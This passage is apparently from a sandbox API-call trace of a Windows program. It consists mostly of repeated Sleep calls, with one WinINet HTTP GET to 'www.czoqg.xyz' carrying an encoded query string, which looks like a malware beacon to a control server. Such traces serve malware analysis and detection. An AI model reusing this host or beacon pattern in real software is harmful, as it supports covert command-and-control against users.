(dwMilliseconds=0x7d0) [0215.567] Sleep (dwMilliseconds=0x7d0) [0215.588] Sleep (dwMilliseconds=0x7d0) [0215.605] Sleep (dwMilliseconds=0x7d0) [0215.642] Sleep (dwMilliseconds=0x7d0) [0215.679] Sleep (dwMilliseconds=0x7d0) [0215.715] Sleep (dwMilliseconds=0x7d0) [0215.749] Sleep (dwMilliseconds=0x7d0) [0215.757] Sleep (dwMilliseconds=0x7d0) [0215.793] Sleep (dwMilliseconds=0x7d0) [0215.830] Sleep (dwMilliseconds=0x7d0) [0215.865] Sleep (dwMilliseconds=0x7d0) [0215.912] Sleep (dwMilliseconds=0x7d0) [0215.916] Sleep (dwMilliseconds=0x7d0) [0215.953] Sleep (dwMilliseconds=0x7d0) [0215.988] Sleep (dwMilliseconds=0x7d0) [0216.021] Sleep (dwMilliseconds=0x7d0) [0216.023] Sleep (dwMilliseconds=0x7d0) [0216.025] Sleep (dwMilliseconds=0x7d0) [0216.059] Sleep (dwMilliseconds=0x7d0) [0216.097] Sleep (dwMilliseconds=0x7d0) [0216.133] Sleep (dwMilliseconds=0x7d0) [0216.138] Sleep (dwMilliseconds=0x7d0) [0216.169] Sleep (dwMilliseconds=0x7d0) [0216.205] Sleep (dwMilliseconds=0x7d0) [0216.239] Sleep (dwMilliseconds=0x7d0) [0216.245] Sleep (dwMilliseconds=0x7d0) [0216.287] Sleep (dwMilliseconds=0x7d0) [0216.322] Sleep (dwMilliseconds=0x7d0) [0216.395] Sleep (dwMilliseconds=0x7d0) [0216.403] Sleep (dwMilliseconds=0x7d0) [0216.404] Sleep (dwMilliseconds=0x7d0) [0216.433] Sleep (dwMilliseconds=0x7d0) [0216.468] Sleep (dwMilliseconds=0x7d0) [0216.504] Sleep (dwMilliseconds=0x7d0) [0216.526] Sleep (dwMilliseconds=0x7d0) [0216.528] Sleep (dwMilliseconds=0x7d0) [0216.541] Sleep (dwMilliseconds=0x7d0) [0216.576] Sleep (dwMilliseconds=0x7d0) [0216.612] Sleep (dwMilliseconds=0x7d0) [0216.640] Sleep (dwMilliseconds=0x7d0) [0216.642] Sleep (dwMilliseconds=0x7d0) [0216.648] Sleep (dwMilliseconds=0x7d0) [0216.683] Sleep (dwMilliseconds=0x7d0) [0216.719] Sleep (dwMilliseconds=0x7d0) [0216.749] Sleep (dwMilliseconds=0x7d0) [0216.751] Sleep (dwMilliseconds=0x7d0) [0216.755] Sleep (dwMilliseconds=0x7d0) [0216.789] Sleep (dwMilliseconds=0x7d0) [0216.824] Sleep (dwMilliseconds=0x7d0) [0216.860] Sleep (dwMilliseconds=0x7d0) [0216.861] Sleep (dwMilliseconds=0x7d0) [0216.944] Sleep (dwMilliseconds=0x7d0) [0216.980] Sleep (dwMilliseconds=0x7d0) [0217.017] Sleep (dwMilliseconds=0x7d0) [0217.040] Sleep (dwMilliseconds=0x7d0) [0217.054] Sleep (dwMilliseconds=0x7d0) [0217.089] Sleep (dwMilliseconds=0x7d0) [0217.125] Sleep (dwMilliseconds=0x7d0) [0217.156] Sleep (dwMilliseconds=0x7d0) [0217.157] Sleep (dwMilliseconds=0x7d0) [0217.162] Sleep (dwMilliseconds=0x7d0) [0217.197] Sleep (dwMilliseconds=0x7d0) [0217.265] Sleep (dwMilliseconds=0x7d0) [0217.368] Sleep (dwMilliseconds=0x7d0) [0217.399] Sleep (dwMilliseconds=0x7d0) [0217.409] Sleep (dwMilliseconds=0x7d0) [0217.444] Sleep (dwMilliseconds=0x7d0) [0217.481] Sleep (dwMilliseconds=0x7d0) [0217.516] Sleep (dwMilliseconds=0x7d0) [0217.520] Sleep (dwMilliseconds=0x7d0) [0217.554] Sleep (dwMilliseconds=0x7d0) [0217.590] Sleep (dwMilliseconds=0x7d0) [0217.628] Sleep (dwMilliseconds=0x7d0) [0217.663] Sleep (dwMilliseconds=0x7d0) [0217.665] Sleep (dwMilliseconds=0x7d0) [0217.667] Sleep (dwMilliseconds=0x7d0) [0217.702] Sleep (dwMilliseconds=0x7d0) [0217.738] Sleep (dwMilliseconds=0x7d0) [0217.775] Sleep (dwMilliseconds=0x7d0) [0217.811] Sleep (dwMilliseconds=0x7d0) [0217.819] Sleep (dwMilliseconds=0x7d0) [0217.849] Sleep (dwMilliseconds=0x7d0) [0217.933] Sleep (dwMilliseconds=0x7d0) [0217.969] Sleep (dwMilliseconds=0x7d0) [0217.978] Sleep (dwMilliseconds=0x7d0) [0218.007] Sleep (dwMilliseconds=0x7d0) [0218.043] Sleep (dwMilliseconds=0x7d0) [0218.080] Sleep (dwMilliseconds=0x7d0) [0218.109] Sleep (dwMilliseconds=0x7d0) [0218.112] Sleep (dwMilliseconds=0x7d0) [0218.157] Sleep (dwMilliseconds=0x7d0) [0218.193] Sleep (dwMilliseconds=0x7d0) [0218.228] Sleep (dwMilliseconds=0x7d0) [0218.256] Sleep (dwMilliseconds=0x7d0) [0218.258] Sleep (dwMilliseconds=0x7d0) [0218.264] Sleep (dwMilliseconds=0x7d0) [0218.299] Sleep (dwMilliseconds=0x7d0) [0218.398] Sleep (dwMilliseconds=0x7d0) [0218.436] Sleep (dwMilliseconds=0x7d0) [0218.451] Sleep (dwMilliseconds=0x7d0) [0218.453] Sleep (dwMilliseconds=0x7d0) [0218.473] Sleep (dwMilliseconds=0x7d0) [0218.509] Sleep (dwMilliseconds=0x7d0) [0218.545] Sleep (dwMilliseconds=0x7d0) [0218.581] Sleep (dwMilliseconds=0x7d0) [0218.602] Sleep (dwMilliseconds=0x7d0) [0218.619] Sleep (dwMilliseconds=0x7d0) [0218.655] Sleep (dwMilliseconds=0x7d0) [0218.691] Sleep (dwMilliseconds=0x7d0) [0218.728] Sleep (dwMilliseconds=0x7d0) [0218.748] Sleep (dwMilliseconds=0x7d0) [0218.766] Sleep (dwMilliseconds=0x7d0) [0218.802] Sleep (dwMilliseconds=0x7d0) [0218.838] Sleep (dwMilliseconds=0x7d0) [0218.874] Sleep (dwMilliseconds=0x7d0) [0218.907] Sleep (dwMilliseconds=0x7d0) [0218.909] Sleep (dwMilliseconds=0x7d0) [0218.923] Sleep (dwMilliseconds=0x7d0) [0218.959] Sleep (dwMilliseconds=0x7d0) [0218.996] Sleep (dwMilliseconds=0x7d0) [0219.030] Sleep (dwMilliseconds=0x7d0) [0219.042] Sleep (dwMilliseconds=0x7d0) [0219.043] Sleep (dwMilliseconds=0x7d0) [0219.068] Sleep (dwMilliseconds=0x7d0) [0219.104] Sleep (dwMilliseconds=0x7d0) [0219.140] Sleep (dwMilliseconds=0x7d0) [0219.177] Sleep (dwMilliseconds=0x7d0) [0219.188] Sleep (dwMilliseconds=0x7d0) [0219.189] Sleep (dwMilliseconds=0x7d0) [0219.215] Sleep (dwMilliseconds=0x7d0) [0219.251] Sleep (dwMilliseconds=0x7d0) [0219.288] Sleep (dwMilliseconds=0x7d0) [0219.323] Sleep (dwMilliseconds=0x7d0) [0219.360] Sleep (dwMilliseconds=0x7d0) [0219.387] Sleep (dwMilliseconds=0x7d0) [0219.423] Sleep (dwMilliseconds=0x7d0) [0219.459] Sleep (dwMilliseconds=0x7d0) [0219.497] Sleep (dwMilliseconds=0x7d0) [0219.509] Sleep (dwMilliseconds=0x7d0) [0219.510] Sleep (dwMilliseconds=0x7d0) [0219.537] Sleep (dwMilliseconds=0x7d0) [0219.572] Sleep (dwMilliseconds=0x7d0) [0219.608] Sleep (dwMilliseconds=0x7d0) [0219.644] Sleep (dwMilliseconds=0x7d0) [0219.657] Sleep (dwMilliseconds=0x7d0) [0219.658] Sleep (dwMilliseconds=0x7d0) [0219.682] Sleep (dwMilliseconds=0x7d0) [0219.719] Sleep (dwMilliseconds=0x7d0) [0219.754] Sleep (dwMilliseconds=0x7d0) [0219.781] Sleep (dwMilliseconds=0x7d0) [0219.790] Sleep (dwMilliseconds=0x7d0) [0219.825] Sleep (dwMilliseconds=0x7d0) [0219.862] Sleep (dwMilliseconds=0x7d0) [0219.909] Sleep (dwMilliseconds=0x7d0) [0219.919] Sleep (dwMilliseconds=0x7d0) [0219.921] Sleep (dwMilliseconds=0x7d0) [0219.947] Sleep (dwMilliseconds=0x7d0) [0219.982] Sleep (dwMilliseconds=0x7d0) [0220.019] Sleep (dwMilliseconds=0x7d0) [0220.055] Sleep (dwMilliseconds=0x7d0) [0220.073] Sleep (dwMilliseconds=0x7d0) [0220.076] Sleep (dwMilliseconds=0x7d0) [0220.100] Sleep (dwMilliseconds=0x7d0) [0220.136] Sleep (dwMilliseconds=0x7d0) [0220.174] Sleep (dwMilliseconds=0x7d0) [0220.211] Sleep (dwMilliseconds=0x7d0) [0220.223] Sleep (dwMilliseconds=0x7d0) [0220.248] Sleep (dwMilliseconds=0x7d0) [0220.283] Sleep (dwMilliseconds=0x7d0) [0220.319] Sleep (dwMilliseconds=0x7d0) [0220.360] Sleep (dwMilliseconds=0x7d0) [0220.362] Sleep (dwMilliseconds=0x7d0) [0220.378] Sleep (dwMilliseconds=0x7d0) [0220.413] Sleep (dwMilliseconds=0x7d0) [0220.450] Sleep (dwMilliseconds=0x7d0) [0220.483] Sleep (dwMilliseconds=0x7d0) [0220.484] Sleep (dwMilliseconds=0x7d0) [0220.487] Sleep (dwMilliseconds=0x7d0) [0220.521] Sleep (dwMilliseconds=0x7d0) [0220.557] Sleep (dwMilliseconds=0x7d0) [0220.592] Sleep (dwMilliseconds=0x7d0) [0220.597] Sleep (dwMilliseconds=0x7d0) [0220.628] Sleep (dwMilliseconds=0x7d0) [0220.664] Sleep (dwMilliseconds=0x7d0) [0220.699] Sleep (dwMilliseconds=0x7d0) [0220.725] Sleep (dwMilliseconds=0x7d0) [0220.737] Sleep (dwMilliseconds=0x7d0) [0220.772] Sleep (dwMilliseconds=0x7d0) [0220.807] Sleep (dwMilliseconds=0x7d0) [0220.845] Sleep (dwMilliseconds=0x7d0) [0220.856] Sleep (dwMilliseconds=0x7d0) [0220.857] Sleep (dwMilliseconds=0x7d0) [0220.883] Sleep (dwMilliseconds=0x7d0) [0220.929] Sleep (dwMilliseconds=0x7d0) [0220.966] Sleep (dwMilliseconds=0x7d0) [0221.001] Sleep (dwMilliseconds=0x7d0) [0221.008] Sleep (dwMilliseconds=0x7d0) [0221.009] Sleep (dwMilliseconds=0x7d0) [0221.039] Sleep (dwMilliseconds=0x7d0) [0221.074] Sleep (dwMilliseconds=0x7d0) [0221.112] Sleep (dwMilliseconds=0x7d0) [0221.147] Sleep (dwMilliseconds=0x7d0) [0221.154] Sleep (dwMilliseconds=0x7d0) [0221.184] Sleep (dwMilliseconds=0x7d0) [0221.220] Sleep (dwMilliseconds=0x7d0) [0221.255] Sleep (dwMilliseconds=0x7d0) [0221.264] Sleep (dwMilliseconds=0x7d0) [0221.292] Sleep (dwMilliseconds=0x7d0) [0221.328] Sleep (dwMilliseconds=0x7d0) [0221.383] Sleep (dwMilliseconds=0x7d0) [0221.392] Sleep (dwMilliseconds=0x7d0) [0221.394] Sleep (dwMilliseconds=0x7d0) [0221.420] Sleep (dwMilliseconds=0x7d0) [0221.454] Sleep (dwMilliseconds=0x7d0) [0221.490] Sleep (dwMilliseconds=0x7d0) [0221.501] Sleep (dwMilliseconds=0x7d0) [0221.525] Sleep (dwMilliseconds=0x7d0) [0221.561] Sleep (dwMilliseconds=0x7d0) [0221.595] Sleep (dwMilliseconds=0x7d0) [0221.607] Sleep (dwMilliseconds=0x7d0) [0221.609] Sleep (dwMilliseconds=0x7d0) [0221.632] Sleep (dwMilliseconds=0x7d0) [0221.667] Sleep (dwMilliseconds=0x7d0) [0221.704] Sleep (dwMilliseconds=0x7d0) [0221.719] Sleep (dwMilliseconds=0x7d0) [0221.775] Sleep (dwMilliseconds=0x7d0) [0221.811] Sleep (dwMilliseconds=0x7d0) [0221.846] Sleep (dwMilliseconds=0x7d0) [0221.880] Sleep (dwMilliseconds=0x7d0) [0221.887] Sleep (dwMilliseconds=0x7d0) [0221.902] Sleep (dwMilliseconds=0x7d0) [0221.938] Sleep (dwMilliseconds=0x7d0) [0222.150] Sleep (dwMilliseconds=0x7d0) [0222.458] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.czoqg.xyz", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0222.461] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fw02/?ZZI=i8U3GOpzdfOw2GgzvLmi5UUBcFXKNl9MVWatKm+oWi3pb1CAVMFUg5iZfze9PYgRR7t+FA==&elzp=TTtX", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x1) returned 0xcc000c [0222.462] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0243.610] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0243.610] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0243.610] Sleep (dwMilliseconds=0x7d0) [0243.612] Sleep (dwMilliseconds=0x7d0) [0243.613] Sleep (dwMilliseconds=0x7d0) [0243.615] Sleep (dwMilliseconds=0x7d0) [0243.616] Sleep (dwMilliseconds=0x7d0) [0243.618] Sleep (dwMilliseconds=0x7d0) [0243.619] Sleep (dwMilliseconds=0x7d0) [0243.621] Sleep (dwMilliseconds=0x7d0) [0243.622] Sleep (dwMilliseconds=0x7d0) [0243.624] Sleep (dwMilliseconds=0x7d0) [0243.625] Sleep (dwMilliseconds=0x7d0) [0243.627] Sleep (dwMilliseconds=0x7d0) [0243.628] Sleep (dwMilliseconds=0x7d0) [0243.630] Sleep (dwMilliseconds=0x7d0) [0243.631] Sleep (dwMilliseconds=0x7d0) [0243.633] Sleep (dwMilliseconds=0x7d0) [0243.634] Sleep (dwMilliseconds=0x7d0) [0243.636] Sleep (dwMilliseconds=0x7d0) [0243.637] Sleep (dwMilliseconds=0x7d0) [0243.639] Sleep (dwMilliseconds=0x7d0) [0243.640] Sleep (dwMilliseconds=0x7d0) [0243.642] Sleep (dwMilliseconds=0x7d0) [0243.643] Sleep (dwMilliseconds=0x7d0) [0243.645] Sleep (dwMilliseconds=0x7d0) [0243.646] Sleep (dwMilliseconds=0x7d0) [0243.648] Sleep (dwMilliseconds=0x7d0) [0243.649] Sleep (dwMilliseconds=0x7d0) [0243.651] Sleep (dwMilliseconds=0x7d0) [0243.652] Sleep (dwMilliseconds=0x7d0) [0243.654] Sleep (dwMilliseconds=0x7d0) [0243.655] Sleep (dwMilliseconds=0x7d0) [0243.657] Sleep (dwMilliseconds=0x7d0) [0243.658] Sleep (dwMilliseconds=0x7d0) [0243.660] Sleep (dwMilliseconds=0x7d0) [0243.661] Sleep (dwMilliseconds=0x7d0) [0243.663] Sleep (dwMilliseconds=0x7d0) [0243.665] Sleep (dwMilliseconds=0x7d0) [0243.667] Sleep (dwMilliseconds=0x7d0) [0243.668] Sleep (dwMilliseconds=0x7d0) [0243.670] Sleep (dwMilliseconds=0x7d0) [0243.671] Sleep (dwMilliseconds=0x7d0) [0243.673] Sleep (dwMilliseconds=0x7d0) [0243.674] Sleep (dwMilliseconds=0x7d0) [0243.676] Sleep (dwMilliseconds=0x7d0) [0243.677] Sleep (dwMilliseconds=0x7d0) [0243.679] Sleep (dwMilliseconds=0x7d0) [0243.680] Sleep (dwMilliseconds=0x7d0) [0243.682] Sleep (dwMilliseconds=0x7d0) [0243.683] Sleep (dwMilliseconds=0x7d0) [0243.685] Sleep (dwMilliseconds=0x7d0) [0243.686] Sleep (dwMilliseconds=0x7d0) [0243.688] Sleep (dwMilliseconds=0x7d0) [0243.689] Sleep (dwMilliseconds=0x7d0) [0243.691] Sleep (dwMilliseconds=0x7d0) [0243.692] Sleep (dwMilliseconds=0x7d0) [0243.694] Sleep (dwMilliseconds=0x7d0) [0243.695] Sleep (dwMilliseconds=0x7d0) [0243.697] Sleep (dwMilliseconds=0x7d0) [0243.698] Sleep (dwMilliseconds=0x7d0) [0243.700] Sleep (dwMilliseconds=0x7d0) [0243.701] Sleep (dwMilliseconds=0x7d0) [0243.703] Sleep (dwMilliseconds=0x7d0) [0243.704] Sleep (dwMilliseconds=0x7d0) [0243.706] Sleep (dwMilliseconds=0x7d0) [0243.707] Sleep (dwMilliseconds=0x7d0) [0243.709] Sleep (dwMilliseconds=0x7d0) [0243.711] Sleep (dwMilliseconds=0x7d0) [0243.713] Sleep (dwMilliseconds=0x7d0) [0243.714] Sleep (dwMilliseconds=0x7d0) [0243.716] Sleep (dwMilliseconds=0x7d0) [0243.717] Sleep (dwMilliseconds=0x7d0) [0243.719] Sleep (dwMilliseconds=0x7d0) [0243.720] Sleep (dwMilliseconds=0x7d0) [0243.722] Sleep (dwMilliseconds=0x7d0) [0243.725] Sleep (dwMilliseconds=0x7d0) [0243.726] Sleep (dwMilliseconds=0x7d0) [0243.728] Sleep (dwMilliseconds=0x7d0) [0243.729] Sleep (dwMilliseconds=0x7d0) [0243.731] Sleep (dwMilliseconds=0x7d0) [0243.732] Sleep (dwMilliseconds=0x7d0) [0243.734] Sleep (dwMilliseconds=0x7d0) [0243.736] Sleep (dwMilliseconds=0x7d0) [0243.737] Sleep (dwMilliseconds=0x7d0) [0243.738] Sleep (dwMilliseconds=0x7d0) [0243.745] Sleep (dwMilliseconds=0x7d0) [0243.749] Sleep (dwMilliseconds=0x7d0) [0243.750] Sleep (dwMilliseconds=0x7d0) [0243.752] Sleep (dwMilliseconds=0x7d0) [0243.753] Sleep (dwMilliseconds=0x7d0) [0243.755] Sleep (dwMilliseconds=0x7d0) [0243.756] Sleep (dwMilliseconds=0x7d0) [0243.757] Sleep (dwMilliseconds=0x7d0) [0243.759] Sleep (dwMilliseconds=0x7d0) [0243.760] Sleep (dwMilliseconds=0x7d0) [0243.762] Sleep (dwMilliseconds=0x7d0) [0243.763] Sleep (dwMilliseconds=0x7d0) [0243.766] Sleep (dwMilliseconds=0x7d0) [0243.767] Sleep (dwMilliseconds=0x7d0) [0243.769] Sleep (dwMilliseconds=0x7d0) [0243.770] Sleep (dwMilliseconds=0x7d0) [0243.772] Sleep (dwMilliseconds=0x7d0) [0243.773] Sleep (dwMilliseconds=0x7d0) [0243.775] Sleep (dwMilliseconds=0x7d0) [0243.776] Sleep (dwMilliseconds=0x7d0) [0243.778] Sleep (dwMilliseconds=0x7d0) [0243.779] Sleep (dwMilliseconds=0x7d0) [0243.781] Sleep (dwMilliseconds=0x7d0) [0243.782] Sleep (dwMilliseconds=0x7d0) [0243.784] Sleep (dwMilliseconds=0x7d0) [0243.785] Sleep (dwMilliseconds=0x7d0) [0243.787] Sleep (dwMilliseconds=0x7d0) [0243.788] Sleep (dwMilliseconds=0x7d0) [0243.790] Sleep (dwMilliseconds=0x7d0) [0243.791] Sleep (dwMilliseconds=0x7d0) [0243.793] Sleep (dwMilliseconds=0x7d0) [0243.794] Sleep (dwMilliseconds=0x7d0) [0243.796] Sleep (dwMilliseconds=0x7d0) [0243.799] Sleep (dwMilliseconds=0x7d0) [0243.801] Sleep (dwMilliseconds=0x7d0) [0243.802] Sleep (dwMilliseconds=0x7d0) [0243.804] Sleep (dwMilliseconds=0x7d0) [0243.805] Sleep (dwMilliseconds=0x7d0) [0243.807] Sleep (dwMilliseconds=0x7d0) [0243.808] Sleep (dwMilliseconds=0x7d0) [0243.810] Sleep (dwMilliseconds=0x7d0) [0243.811] Sleep (dwMilliseconds=0x7d0) [0243.813] Sleep (dwMilliseconds=0x7d0) [0243.814] Sleep (dwMilliseconds=0x7d0) [0243.816] Sleep (dwMilliseconds=0x7d0) [0243.818] Sleep (dwMilliseconds=0x7d0) [0243.819] Sleep (dwMilliseconds=0x7d0) [0243.820] Sleep (dwMilliseconds=0x7d0) [0243.822] Sleep (dwMilliseconds=0x7d0) [0243.823] Sleep (dwMilliseconds=0x7d0) [0243.825] Sleep (dwMilliseconds=0x7d0) [0243.826] Sleep (dwMilliseconds=0x7d0) [0243.828] Sleep (dwMilliseconds=0x7d0) [0243.829] Sleep (dwMilliseconds=0x7d0) [0243.831] Sleep (dwMilliseconds=0x7d0) [0243.832] Sleep (dwMilliseconds=0x7d0) [0243.834] Sleep (dwMilliseconds=0x7d0) [0243.835] Sleep (dwMilliseconds=0x7d0) [0243.837] Sleep (dwMilliseconds=0x7d0) [0243.838] Sleep (dwMilliseconds=0x7d0) [0243.840] Sleep (dwMilliseconds=0x7d0) [0243.841] Sleep (dwMilliseconds=0x7d0) [0243.843] Sleep (dwMilliseconds=0x7d0) [0243.844] Sleep (dwMilliseconds=0x7d0) [0243.846] Sleep (dwMilliseconds=0x7d0) [0243.847] Sleep (dwMilliseconds=0x7d0) [0243.849] Sleep (dwMilliseconds=0x7d0) [0243.850] Sleep (dwMilliseconds=0x7d0) [0243.852] Sleep (dwMilliseconds=0x7d0) [0243.853] Sleep (dwMilliseconds=0x7d0) [0243.855] Sleep (dwMilliseconds=0x7d0) [0243.856] Sleep (dwMilliseconds=0x7d0) [0243.858] Sleep (dwMilliseconds=0x7d0) [0243.859] Sleep (dwMilliseconds=0x7d0) [0243.861] Sleep (dwMilliseconds=0x7d0) [0243.862] Sleep (dwMilliseconds=0x7d0) [0243.864] Sleep (dwMilliseconds=0x7d0) [0243.866] Sleep (dwMilliseconds=0x7d0) [0243.868] Sleep (dwMilliseconds=0x7d0) [0243.869] Sleep (dwMilliseconds=0x7d0) [0243.871] Sleep (dwMilliseconds=0x7d0) [0243.872] Sleep (dwMilliseconds=0x7d0) [0243.874] Sleep (dwMilliseconds=0x7d0) [0243.875] Sleep (dwMilliseconds=0x7d0) [0243.877] Sleep (dwMilliseconds=0x7d0) [0243.878] Sleep (dwMilliseconds=0x7d0) [0243.880] Sleep (dwMilliseconds=0x7d0) [0243.881] Sleep (dwMilliseconds=0x7d0) [0243.883] Sleep (dwMilliseconds=0x7d0) [0243.884] Sleep (dwMilliseconds=0x7d0) [0243.886] Sleep (dwMilliseconds=0x7d0) [0243.887] Sleep (dwMilliseconds=0x7d0) [0243.889] Sleep (dwMilliseconds=0x7d0) [0243.890] Sleep (dwMilliseconds=0x7d0) [0243.892] Sleep (dwMilliseconds=0x7d0) [0243.893] Sleep (dwMilliseconds=0x7d0) [0243.905] Sleep (dwMilliseconds=0x7d0) [0243.907] Sleep (dwMilliseconds=0x7d0) [0243.908] Sleep (dwMilliseconds=0x7d0) [0243.910] Sleep (dwMilliseconds=0x7d0) [0243.912] Sleep (dwMilliseconds=0x7d0) [0243.913] Sleep (dwMilliseconds=0x7d0) [0243.914] Sleep (dwMilliseconds=0x7d0) [0243.916] Sleep (dwMilliseconds=0x7d0) [0243.917] Sleep (dwMilliseconds=0x7d0) [0243.919] Sleep (dwMilliseconds=0x7d0) [0243.920] Sleep (dwMilliseconds=0x7d0) [0243.922] Sleep (dwMilliseconds=0x7d0) [0243.923] Sleep (dwMilliseconds=0x7d0) [0243.925] Sleep (dwMilliseconds=0x7d0) [0243.926] Sleep (dwMilliseconds=0x7d0) [0243.928] Sleep (dwMilliseconds=0x7d0) [0243.929] Sleep (dwMilliseconds=0x7d0) [0243.931] Sleep (dwMilliseconds=0x7d0) [0243.932] Sleep (dwMilliseconds=0x7d0) [0243.934] Sleep (dwMilliseconds=0x7d0) [0243.936] Sleep (dwMilliseconds=0x7d0) [0243.937] Sleep (dwMilliseconds=0x7d0) [0243.938] Sleep (dwMilliseconds=0x7d0) [0243.940] Sleep (dwMilliseconds=0x7d0) [0243.941] Sleep (dwMilliseconds=0x7d0) [0243.943] Sleep (dwMilliseconds=0x7d0) [0243.944] Sleep (dwMilliseconds=0x7d0) [0243.946] Sleep (dwMilliseconds=0x7d0) [0243.947] Sleep (dwMilliseconds=0x7d0) [0243.949] Sleep (dwMilliseconds=0x7d0) [0243.950] Sleep (dwMilliseconds=0x7d0) [0243.952] Sleep (dwMilliseconds=0x7d0) [0243.953] Sleep (dwMilliseconds=0x7d0) [0243.955] Sleep (dwMilliseconds=0x7d0) [0243.956] Sleep (dwMilliseconds=0x7d0) [0243.958] Sleep (dwMilliseconds=0x7d0) [0243.959] Sleep (dwMilliseconds=0x7d0) [0243.961] Sleep (dwMilliseconds=0x7d0) [0243.962] Sleep (dwMilliseconds=0x7d0) [0243.964] Sleep (dwMilliseconds=0x7d0) [0243.967] Sleep (dwMilliseconds=0x7d0) [0243.968] Sleep (dwMilliseconds=0x7d0) [0243.970] Sleep (dwMilliseconds=0x7d0) [0243.971] Sleep (dwMilliseconds=0x7d0) [0243.973] Sleep (dwMilliseconds=0x7d0) [0243.974] Sleep (dwMilliseconds=0x7d0) [0243.976] Sleep (dwMilliseconds=0x7d0) [0243.977] Sleep (dwMilliseconds=0x7d0) [0243.979] Sleep (dwMilliseconds=0x7d0) [0243.980] Sleep (dwMilliseconds=0x7d0) [0243.982] Sleep (dwMilliseconds=0x7d0) [0243.983] Sleep (dwMilliseconds=0x7d0) [0243.985] Sleep (dwMilliseconds=0x7d0) [0243.986] Sleep (dwMilliseconds=0x7d0) [0243.988] Sleep (dwMilliseconds=0x7d0) [0243.989] Sleep (dwMilliseconds=0x7d0) [0243.991] Sleep (dwMilliseconds=0x7d0) [0243.992] Sleep (dwMilliseconds=0x7d0) [0243.994] Sleep (dwMilliseconds=0x7d0) [0243.995] Sleep (dwMilliseconds=0x7d0) [0243.997] Sleep (dwMilliseconds=0x7d0) [0243.998] Sleep (dwMilliseconds=0x7d0) [0244.000] Sleep (dwMilliseconds=0x7d0) [0244.001] Sleep (dwMilliseconds=0x7d0) [0244.003] Sleep (dwMilliseconds=0x7d0) [0244.004] Sleep (dwMilliseconds=0x7d0) [0244.006] Sleep (dwMilliseconds=0x7d0) [0244.007] Sleep (dwMilliseconds=0x7d0) [0244.009] Sleep (dwMilliseconds=0x7d0) [0244.010] Sleep (dwMilliseconds=0x7d0) [0244.012] Sleep (dwMilliseconds=0x7d0) [0244.013] Sleep (dwMilliseconds=0x7d0) [0244.015] Sleep (dwMilliseconds=0x7d0) [0244.016] Sleep (dwMilliseconds=0x7d0) [0244.018] Sleep (dwMilliseconds=0x7d0) [0244.019] Sleep (dwMilliseconds=0x7d0) [0244.021] Sleep (dwMilliseconds=0x7d0) [0244.022] Sleep (dwMilliseconds=0x7d0) [0244.024] Sleep (dwMilliseconds=0x7d0) [0244.025] Sleep (dwMilliseconds=0x7d0) [0244.027] Sleep (dwMilliseconds=0x7d0) [0244.028] Sleep (dwMilliseconds=0x7d0) [0244.030] Sleep (dwMilliseconds=0x7d0) [0244.031] Sleep (dwMilliseconds=0x7d0) [0244.033] Sleep (dwMilliseconds=0x7d0) [0244.034] Sleep (dwMilliseconds=0x7d0) [0244.036] Sleep (dwMilliseconds=0x7d0) [0244.038] Sleep (dwMilliseconds=0x7d0) [0244.039] Sleep (dwMilliseconds=0x7d0) [0244.040] Sleep (dwMilliseconds=0x7d0) [0244.042] Sleep (dwMilliseconds=0x7d0) [0244.043] Sleep (dwMilliseconds=0x7d0) [0244.045] Sleep (dwMilliseconds=0x7d0) [0244.046] Sleep (dwMilliseconds=0x7d0) [0244.078] Sleep (dwMilliseconds=0x7d0) [0244.114] Sleep (dwMilliseconds=0x7d0) [0244.115] Sleep (dwMilliseconds=0x7d0) [0244.150] Sleep (dwMilliseconds=0x7d0) [0244.189] Sleep (dwMilliseconds=0x7d0) [0244.226] Sleep (dwMilliseconds=0x7d0) [0244.272] Sleep (dwMilliseconds=0x7d0) [0244.286] Sleep (dwMilliseconds=0x7d0) [0244.311] Sleep (dwMilliseconds=0x7d0) [0244.347] Sleep (dwMilliseconds=0x7d0) [0244.386] Sleep (dwMilliseconds=0x7d0) [0244.421] Sleep (dwMilliseconds=0x7d0) [0244.444] Sleep (dwMilliseconds=0x7d0) [0244.473] Sleep (dwMilliseconds=0x7d0) [0244.509] Sleep (dwMilliseconds=0x7d0) [0244.545] Sleep (dwMilliseconds=0x7d0) [0244.586] Sleep (dwMilliseconds=0x7d0) [0244.622] Sleep (dwMilliseconds=0x7d0) [0244.632] Sleep (dwMilliseconds=0x7d0) [0244.660] Sleep (dwMilliseconds=0x7d0) [0244.697] Sleep (dwMilliseconds=0x7d0) [0244.734] Sleep (dwMilliseconds=0x7d0) [0244.769] Sleep (dwMilliseconds=0x7d0) [0244.796] Sleep (dwMilliseconds=0x7d0) [0244.824] Sleep (dwMilliseconds=0x7d0) [0244.866] Sleep (dwMilliseconds=0x7d0) [0244.914] Sleep (dwMilliseconds=0x7d0) [0244.952] Sleep (dwMilliseconds=0x7d0) [0244.990] Sleep (dwMilliseconds=0x7d0) [0245.024] Sleep (dwMilliseconds=0x7d0) [0245.029] Sleep (dwMilliseconds=0x7d0) [0245.064] Sleep (dwMilliseconds=0x7d0) [0245.104] Sleep (dwMilliseconds=0x7d0) [0245.139] Sleep (dwMilliseconds=0x7d0) [0245.170] Sleep (dwMilliseconds=0x7d0) [0245.171] Sleep (dwMilliseconds=0x7d0) [0245.177] Sleep (dwMilliseconds=0x7d0) [0245.213] Sleep (dwMilliseconds=0x7d0) [0245.250] Sleep (dwMilliseconds=0x7d0) [0245.285] Sleep (dwMilliseconds=0x7d0) [0245.291] Sleep (dwMilliseconds=0x7d0) [0245.323] Sleep (dwMilliseconds=0x7d0) [0245.358] Sleep (dwMilliseconds=0x7d0) [0245.395] Sleep (dwMilliseconds=0x7d0) [0245.401] Sleep (dwMilliseconds=0x7d0) [0245.402] Sleep (dwMilliseconds=0x7d0) [0245.432] Sleep (dwMilliseconds=0x7d0) [0245.492] Sleep (dwMilliseconds=0x7d0) [0245.530] Sleep (dwMilliseconds=0x7d0) [0245.565] Sleep (dwMilliseconds=0x7d0) [0245.572] Sleep (dwMilliseconds=0x7d0) [0245.573] Sleep 